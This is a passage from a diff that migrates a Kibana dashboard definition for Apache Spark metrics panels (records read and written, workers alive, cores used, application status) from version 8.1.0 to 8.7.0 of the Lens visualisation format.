"f983c8f0-92bc-4d73-b8d4-f8d7c7851fb0", - "layerId": "aa4bc89a-1467-4370-980f-99b6e33890d7", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of Applications waiting [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "75c23769-a2bd-4825-b20a-d140aeb36175", + "w": 8, + "x": 26, + "y": 28 + }, + "panelIndex": "75c23769-a2bd-4825-b20a-d140aeb36175", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-aa4bc89a-1467-4370-980f-99b6e33890d7", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "975bff6a-acfa-481f-86ba-7d697e207f65", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "b889078f-52b4-4fdd-8fd5-6a636ff903a6", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "aa4bc89a-1467-4370-980f-99b6e33890d7": { + "columnOrder": [ + "f983c8f0-92bc-4d73-b8d4-f8d7c7851fb0" + ], + "columns": { + "f983c8f0-92bc-4d73-b8d4-f8d7c7851fb0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Records Read", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.executor.records.read" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "975bff6a-acfa-481f-86ba-7d697e207f65", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.executor" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "75c23769-a2bd-4825-b20a-d140aeb36175", - "w": 8, - "x": 26, - "y": 28 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.executor" + } + } }, - "panelIndex": "75c23769-a2bd-4825-b20a-d140aeb36175", - "title": "Number of Records Read [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "b889078f-52b4-4fdd-8fd5-6a636ff903a6", + "key": "apache_spark.executor.records.read", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.executor.records.read" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "f983c8f0-92bc-4d73-b8d4-f8d7c7851fb0", + "layerId": "aa4bc89a-1467-4370-980f-99b6e33890d7", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-de0d9a21-100f-4912-a985-ca42e4347241", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "cffd3ad8-723b-4694-bf3e-9d8a826ce05e", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a3034e1f-cb79-4ef6-91f1-ff8b1f2510c8", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "de0d9a21-100f-4912-a985-ca42e4347241": { - "columnOrder": [ - "b14cce00-3621-4cc5-b9c9-75f22b038c77" - ], - "columns": { - "b14cce00-3621-4cc5-b9c9-75f22b038c77": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Records Written", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.executor.records.written" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "cffd3ad8-723b-4694-bf3e-9d8a826ce05e", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.executor" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.executor" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "a3034e1f-cb79-4ef6-91f1-ff8b1f2510c8", - "key": "apache_spark.executor.records.written", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.executor.records.written" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "b14cce00-3621-4cc5-b9c9-75f22b038c77", - "layerId": "de0d9a21-100f-4912-a985-ca42e4347241", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of Records Read [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "ab9316b5-5728-4b03-aadb-a93e22da9257", + "w": 7, + "x": 34, + "y": 28 + }, + "panelIndex": "ab9316b5-5728-4b03-aadb-a93e22da9257", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-de0d9a21-100f-4912-a985-ca42e4347241", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "cffd3ad8-723b-4694-bf3e-9d8a826ce05e", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "a3034e1f-cb79-4ef6-91f1-ff8b1f2510c8", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "de0d9a21-100f-4912-a985-ca42e4347241": { + "columnOrder": [ + "b14cce00-3621-4cc5-b9c9-75f22b038c77" + ], + "columns": { + "b14cce00-3621-4cc5-b9c9-75f22b038c77": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Records Written", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.executor.records.written" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "cffd3ad8-723b-4694-bf3e-9d8a826ce05e", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.executor" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "ab9316b5-5728-4b03-aadb-a93e22da9257", - "w": 7, - "x": 34, - "y": 28 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.executor" + } + } }, - "panelIndex": "ab9316b5-5728-4b03-aadb-a93e22da9257", - "title": "Number of Records Written [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "a3034e1f-cb79-4ef6-91f1-ff8b1f2510c8", + "key": "apache_spark.executor.records.written", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.executor.records.written" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "b14cce00-3621-4cc5-b9c9-75f22b038c77", + "layerId": "de0d9a21-100f-4912-a985-ca42e4347241", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "6fdd6b46-a1d0-470b-bf9a-527dc0444653", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "948085ee-3b01-4c26-8bb4-b3c40b02049d", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6": { - "columnOrder": [ - "1a987909-acd1-47bf-a0ad-4c8c046399a3" - ], - "columns": { - "1a987909-acd1-47bf-a0ad-4c8c046399a3": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Total Applications", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.node.main.applications.count" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "6fdd6b46-a1d0-470b-bf9a-527dc0444653", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.node" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "948085ee-3b01-4c26-8bb4-b3c40b02049d", - "key": "apache_spark.node.main.applications.count", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.node.main.applications.count" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "1a987909-acd1-47bf-a0ad-4c8c046399a3", - "layerId": "6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of Records Written [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 5, + "i": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad", + "w": 7, + "x": 41, + "y": 28 + }, + "panelIndex": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "6fdd6b46-a1d0-470b-bf9a-527dc0444653", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "948085ee-3b01-4c26-8bb4-b3c40b02049d", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6": { + "columnOrder": [ + "1a987909-acd1-47bf-a0ad-4c8c046399a3" + ], + "columns": { + "1a987909-acd1-47bf-a0ad-4c8c046399a3": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Total Applications", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.node.main.applications.count" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "6fdd6b46-a1d0-470b-bf9a-527dc0444653", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.node" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 5, - "i": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad", - "w": 7, - "x": 41, - "y": 28 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.node" + } + } }, - "panelIndex": "ab2aa190-2b49-4ec6-9479-ad4a4ade95ad", - "title": "Total number of Applications [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "948085ee-3b01-4c26-8bb4-b3c40b02049d", + "key": "apache_spark.node.main.applications.count", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.node.main.applications.count" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "1a987909-acd1-47bf-a0ad-4c8c046399a3", + "layerId": "6eefe8fe-74a8-4b9d-a786-7d9dc8ca26e6", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-530fc85b-0ba7-4f65-862b-a303af533c19", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "e76b86a5-b6ba-4537-a0d1-046096a9807d", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "d950973c-f5b8-4aae-857a-e8eccbecd2d6", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "530fc85b-0ba7-4f65-862b-a303af533c19": { - "columnOrder": [ - "759453c2-c093-4aed-8bb4-3e873849ff92" - ], - "columns": { - "759453c2-c093-4aed-8bb4-3e873849ff92": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Workers Alive", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.node.main.workers.alive" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "e76b86a5-b6ba-4537-a0d1-046096a9807d", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.node" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "d950973c-f5b8-4aae-857a-e8eccbecd2d6", - "key": "apache_spark.node.main.workers.alive", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.node.main.workers.alive" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "759453c2-c093-4aed-8bb4-3e873849ff92", - "layerId": "530fc85b-0ba7-4f65-862b-a303af533c19", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Total number of Applications [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 6, + "i": "cfbdf185-1437-478f-a856-eedbe62d1de2", + "w": 8, + "x": 26, + "y": 33 + }, + "panelIndex": "cfbdf185-1437-478f-a856-eedbe62d1de2", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-530fc85b-0ba7-4f65-862b-a303af533c19", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "e76b86a5-b6ba-4537-a0d1-046096a9807d", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "d950973c-f5b8-4aae-857a-e8eccbecd2d6", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "530fc85b-0ba7-4f65-862b-a303af533c19": { + "columnOrder": [ + "759453c2-c093-4aed-8bb4-3e873849ff92" + ], + "columns": { + "759453c2-c093-4aed-8bb4-3e873849ff92": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Workers Alive", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.node.main.workers.alive" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "e76b86a5-b6ba-4537-a0d1-046096a9807d", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.node" }, - "enhancements": {}, - "hidePanelTitles": true - }, - "gridData": { - "h": 6, - "i": "cfbdf185-1437-478f-a856-eedbe62d1de2", - "w": 8, - "x": 26, - "y": 33 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.node" + } + } }, - "panelIndex": "cfbdf185-1437-478f-a856-eedbe62d1de2", - "title": "Number of Workers Alive [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "d950973c-f5b8-4aae-857a-e8eccbecd2d6", + "key": "apache_spark.node.main.workers.alive", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.node.main.workers.alive" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "759453c2-c093-4aed-8bb4-3e873849ff92", + "layerId": "530fc85b-0ba7-4f65-862b-a303af533c19", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-148ce684-6f54-430c-9b71-69989419abd4", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "c7bd1bca-ca54-4168-8ed5-2e45bd906d13", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "148ce684-6f54-430c-9b71-69989419abd4": { - "columnOrder": [ - "47b92b87-6745-4aa9-86cb-988e730f8db0", - "9baa45f5-7118-4b46-a1f7-9dde678df6f0" - ], - "columns": { - "47b92b87-6745-4aa9-86cb-988e730f8db0": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Application Source Status", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "9baa45f5-7118-4b46-a1f7-9dde678df6f0", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": false, - "parentFormat": { - "id": "terms" - }, - "size": 5 - }, - "scale": "ordinal", - "sourceField": "apache_spark.application.status" - }, - "9baa45f5-7118-4b46-a1f7-9dde678df6f0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Application Name", - "operationType": "unique_count", - "scale": "ratio", - "sourceField": "apache_spark.application.name" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "c7bd1bca-ca54-4168-8ed5-2e45bd906d13", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.application" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.application" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "layers": [ - { - "categoryDisplay": "default", - "emptySizeRatio": 0.54, - "groups": [ - "47b92b87-6745-4aa9-86cb-988e730f8db0" - ], - "layerId": "148ce684-6f54-430c-9b71-69989419abd4", - "layerType": "data", - "legendDisplay": "show", - "metric": "9baa45f5-7118-4b46-a1f7-9dde678df6f0", - "nestedLegend": false, - "numberDisplay": "hidden" - } - ], - "shape": "donut" - } + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "type": "lens" + }, + "title": "Number of Workers Alive [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 12, + "i": "78e81e12-c659-4d89-a80d-14ec4e49368a", + "w": 14, + "x": 34, + "y": 33 + }, + "panelIndex": "78e81e12-c659-4d89-a80d-14ec4e49368a", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-148ce684-6f54-430c-9b71-69989419abd4", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "c7bd1bca-ca54-4168-8ed5-2e45bd906d13", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "148ce684-6f54-430c-9b71-69989419abd4": { + "columnOrder": [ + "47b92b87-6745-4aa9-86cb-988e730f8db0", + "9baa45f5-7118-4b46-a1f7-9dde678df6f0" + ], + "columns": { + "47b92b87-6745-4aa9-86cb-988e730f8db0": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Application Source Status", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "columnId": "9baa45f5-7118-4b46-a1f7-9dde678df6f0", + "type": "column" + }, + "orderDirection": "desc", + "otherBucket": false, + "parentFormat": { + "id": "terms" + }, + "size": 5 + }, + "scale": "ordinal", + "sourceField": "apache_spark.application.status" }, - "title": "", - "type": "lens", - "visualizationType": "lnsPie" + "9baa45f5-7118-4b46-a1f7-9dde678df6f0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Application Name", + "operationType": "unique_count", + "scale": "ratio", + "sourceField": "apache_spark.application.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "c7bd1bca-ca54-4168-8ed5-2e45bd906d13", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.application" }, - "enhancements": {}, - "vis": { - "legendOpen": true + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.application" } - }, - "gridData": { - "h": 12, - "i": "78e81e12-c659-4d89-a80d-14ec4e49368a", - "w": 14, - "x": 34, - "y": 33 - }, - "panelIndex": "78e81e12-c659-4d89-a80d-14ec4e49368a", - "title": "Application Source Status [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "layers": [ + { + "categoryDisplay": "default", + "emptySizeRatio": 0.54, + "layerId": "148ce684-6f54-430c-9b71-69989419abd4", + "layerType": "data", + "legendDisplay": "show", + "nestedLegend": false, + "numberDisplay": "hidden", + "legendSize": "auto", + "primaryGroups": [ + "47b92b87-6745-4aa9-86cb-988e730f8db0" + ], + "metrics": [ + "9baa45f5-7118-4b46-a1f7-9dde678df6f0" + ] + } + ], + "shape": "donut" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-87763c10-0d2a-4ff0-afb1-4d261c6c52de", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "7c76ed08-e31a-4d5a-a8a3-d6f7763d3c40", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "fffcc31c-dfa7-4d03-baf5-d0c48357153f", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "87763c10-0d2a-4ff0-afb1-4d261c6c52de": { - "columnOrder": [ - "0c759a6f-eef3-4849-81bb-9482134df3c0" - ], - "columns": { - "0c759a6f-eef3-4849-81bb-9482134df3c0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Number of Cores Used", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.node.worker.cores.used" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "7c76ed08-e31a-4d5a-a8a3-d6f7763d3c40", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.node" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "fffcc31c-dfa7-4d03-baf5-d0c48357153f", - "key": "apache_spark.node.worker.cores.used", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.node.worker.cores.used" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "0c759a6f-eef3-4849-81bb-9482134df3c0", - "layerId": "87763c10-0d2a-4ff0-afb1-4d261c6c52de", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsPie" + }, + "enhancements": {}, + "vis": { + "legendOpen": true + }, + "type": "lens" + }, + "title": "Application Source Status [Metrics Apache Spark]" + }, + { + "version": "8.7.0", + "type": "lens", + "gridData": { + "h": 9, + "i": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843", + "w": 13, + "x": 0, + "y": 36 + }, + "panelIndex": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-current-indexpattern", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-87763c10-0d2a-4ff0-afb1-4d261c6c52de", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "7c76ed08-e31a-4d5a-a8a3-d6f7763d3c40", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "fffcc31c-dfa7-4d03-baf5-d0c48357153f", + "type": "index-pattern" + } + ], + "state": { + "datasourceStates": { + "formBased": { + "layers": { + "87763c10-0d2a-4ff0-afb1-4d261c6c52de": { + "columnOrder": [ + "0c759a6f-eef3-4849-81bb-9482134df3c0" + ], + "columns": { + "0c759a6f-eef3-4849-81bb-9482134df3c0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Number of Cores Used", + "operationType": "last_value", + "params": { + "sortField": "@timestamp", + "showArrayValues": true + }, + "scale": "ratio", + "sourceField": "apache_spark.node.worker.cores.used" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "7c76ed08-e31a-4d5a-a8a3-d6f7763d3c40", + "key": "event.dataset", + "negate": false, + "params": { + "query": "apache_spark.node" }, - "enhancements": {}, - "hidePanelTitles": true, - "vis": null - }, - "gridData": { - "h": 9, - "i": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843", - "w": 13, - "x": 0, - "y": 36 + "type": "phrase" + }, + "query": { + "match_phrase": { + "event.dataset": "apache_spark.node" + } + } }, - "panelIndex": "fa3bca1d-df9c-4e2b-8785-cfe9211a7843", - "title": "Number of Cores used [Metrics Apache Spark]", - "type": "lens", - "version": "8.1.0" + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "fffcc31c-dfa7-4d03-baf5-d0c48357153f", + "key": "apache_spark.node.worker.cores.used", + "negate": false, + "type": "exists", + "value": "exists" + }, + "query": { + "exists": { + "field": "apache_spark.node.worker.cores.used" + } + } + } + ], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "accessor": "0c759a6f-eef3-4849-81bb-9482134df3c0", + "layerId": "87763c10-0d2a-4ff0-afb1-4d261c6c52de", + "layerType": "data", + "textAlign": "center", + "titlePosition": "bottom", + "size": "xl" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-current-indexpattern", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-7a60dd89-db58-4e7e-b73a-139574b69402", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "a871806a-160b-4da4-bcd5-700175899a73", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "55f22446-ec98-430e-b92e-0660335ab2d9", - "type": "index-pattern" - } - ], - "state": { - "datasourceStates": { - "indexpattern": { - "layers": { - "7a60dd89-db58-4e7e-b73a-139574b69402": { - "columnOrder": [ - "2001af6a-ebf0-4acc-afe2-d58db49ee160" - ], - "columns": { - "2001af6a-ebf0-4acc-afe2-d58db49ee160": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Memory Used (MB)", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "apache_spark.node.worker.memory.used" - } - }, - "incompleteColumns": {} - } - } - } - }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "a871806a-160b-4da4-bcd5-700175899a73", - "key": "event.dataset", - "negate": false, - "params": { - "query": "apache_spark.node" - }, - "type": "phrase" - }, - "query": { - "match_phrase": { - "event.dataset": "apache_spark.node" - } - } - }, - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "55f22446-ec98-430e-b92e-0660335ab2d9", - "key": "apache_spark.node.worker.memory.used", - "negate": false, - "type": "exists", - "value": "exists" - }, - "query": { - "exists": { - "field": "apache_spark.node.worker.memory.used" - } - } - } - ], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "accessor": "2001af6a-ebf0-4acc-afe2-d58db49ee160", - "layerId": "7a60dd89-db58-4e7e-b73a-139574b69402", - "layerType": "data" - } - }, - "title": "", - "type": "lens", - "visualizationType": "lnsMetric" + "title": "", + "type": "lens", + "visualizationType": "lnsLegacyMetric" + }, + "enhancements": {}, + "hidePanelTitles": true, + "vis": null, + "type": "lens" + }, + "title": "Number of Cores used [Metrics Apache Spark]" + }, + { + "version": 